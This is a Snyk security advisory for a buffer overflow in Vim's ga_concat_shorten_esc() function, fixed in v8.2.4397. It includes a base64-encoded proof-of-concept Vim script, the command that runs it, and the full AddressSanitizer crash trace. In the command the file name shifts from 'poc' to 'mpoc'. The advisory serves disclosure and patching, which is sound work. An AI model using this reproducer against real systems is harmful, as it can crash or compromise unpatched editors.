Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade vim/vim
to version v8.2.4397 or higher.
Affected versions of this package are vulnerable to Buffer Overflow via ga_concat_shorten_esc()
, when using many composing characters in error message.
$ echo -ne "bm9ybTEwMGdy3YAKZnUgUigpCmxldCBsaW5lPWdldGxpbmUoMSkKcmV0dSBsaW5lCmVuZGYKCmNh
bGwgYXNzZXJ0X2VxdWFsKDEsUigpKQo=" | base64 -d > poc
# ASAN
$ ./src/vim.asan -u NONE -i NONE -n -X -Z -e -m -s -S mpoc -c ":qa!"
=================================================================
==1282255==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x611000001992 at pc 0x000000c512f0 bp 0x7fffffff73d0 sp 0x7fffffff73c8
READ of size 1 at 0x611000001992 thread T0
#0 0xc512ef in ga_concat_shorten_esc /home/alkyne/vim-debug/src/testing.c:106:9
#1 0xc4bdd1 in fill_assert_error /home/alkyne/vim-debug/src/testing.c:236:2
#2 0xc498a4 in assert_equal_common /home/alkyne/vim-debug/src/testing.c:265:2
#3 0xc4972a in f_assert_equal /home/alkyne/vim-debug/src/testing.c:411:28
#4 0x63311b in call_internal_func /home/alkyne/vim-debug/src/evalfunc.c:2863:5
#5 0xcc0dfc in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:14
#6 0xcbf004 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1782:8
#7 0xce002e in ex_call /home/alkyne/vim-debug/src/userfunc.c:5398:6
#8 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#9 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#10 0xad0efe in do_source /home/alkyne/vim-debug/src/scriptfile.c:1516:5
#11 0xace6bc in cmd_source /home/alkyne/vim-debug/src/scriptfile.c:1098:14
#12 0xace43d in ex_source /home/alkyne/vim-debug/src/scriptfile.c:1124:2
#13 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#14 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#15 0x6b4fb0 in do_cmdline_cmd /home/alkyne/vim-debug/src/ex_docmd.c:587:12
#16 0xe9e4c4 in exe_commands /home/alkyne/vim-debug/src/main.c:3089:2
#17 0xe9c1fe in vim_main2 /home/alkyne/vim-debug/src/main.c:772:2
#18 0xe95e3b in main /home/alkyne/vim-debug/src/main.c:424:12
#19 0x7ffff7bf80b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#20 0x41ea0d in _start (/home/alkyne/vim-debug/src/vim.asan+0x41ea0d)
0x611000001992 is located 199 bytes to the right of 203-byte region [0x611000001800,0x6110000018cb)
allocated by thread T0 here:
#0 0x49b1bd in __interceptor_malloc (/home/alkyne/vim-debug/src/vim.asan+0x49b1bd)
#1 0x4cd318 in lalloc /home/alkyne/vim-debug/src/alloc.c:248:11
#2 0x4cd269 in alloc /home/alkyne/vim-debug/src/alloc.c:151:12
#3 0xba8c71 in string_quote /home/alkyne/vim-debug/src/strings.c:782:13
#4 0x617017 in echo_string_core /home/alkyne/vim-debug/src/eval.c:5202:13
#5 0xc87bfa in tv2string /home/alkyne/vim-debug/src/typval.c:2186:12
#6 0xc4bdc6 in fill_assert_error /home/alkyne/vim-debug/src/testing.c:236:29
#7 0xc498a4 in assert_equal_common /home/alkyne/vim-debug/src/testing.c:265:2
#8 0xc4972a in f_assert_equal /home/alkyne/vim-debug/src/testing.c:411:28
#9 0x63311b in call_internal_func /home/alkyne/vim-debug/src/evalfunc.c:2863:5
#10 0xcc0dfc in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:14
#11 0xcbf004 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1782:8
#12 0xce002e in ex_call /home/alkyne/vim-debug/src/userfunc.c:5398:6
#13 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#14 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#15 0xad0efe in do_source /home/alkyne/vim-debug/src/scriptfile.c:1516:5
#16 0xace6bc in cmd_source /home/alkyne/vim-debug/src/scriptfile.c:1098:14
#17 0xace43d in ex_source /home/alkyne/vim-debug/src/scriptfile.c:1124:2
#18 0x6be248 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#19 0x6b1cf2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#20 0x6b4fb0 in do_cmdline_cmd /home/alkyne/vim-debug/src/ex_docmd.c:587:12
#21 0xe9e4c4 in exe_commands /home/alkyne/vim-debug/src/main.c:3089:2
#22 0xe9c1fe in vim_main2 /home/alkyne/vim-debug/src/main.c:772:2
#23 0xe95e3b in main /home/alkyne/vim-debug/src/main.c:424:12
#24 0x7ffff7bf80b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/alkyne/vim-debug/src/testing.c:106:9 in ga_concat_shorten_esc
Shadow bytes around the buggy address:
0x0c227fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff82f0: 06 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff8310: 00 00 00 00 00 00 00 00 00 03 fa fa fa fa fa fa
0x0c227fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c227fff8330: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1282255==ABORTING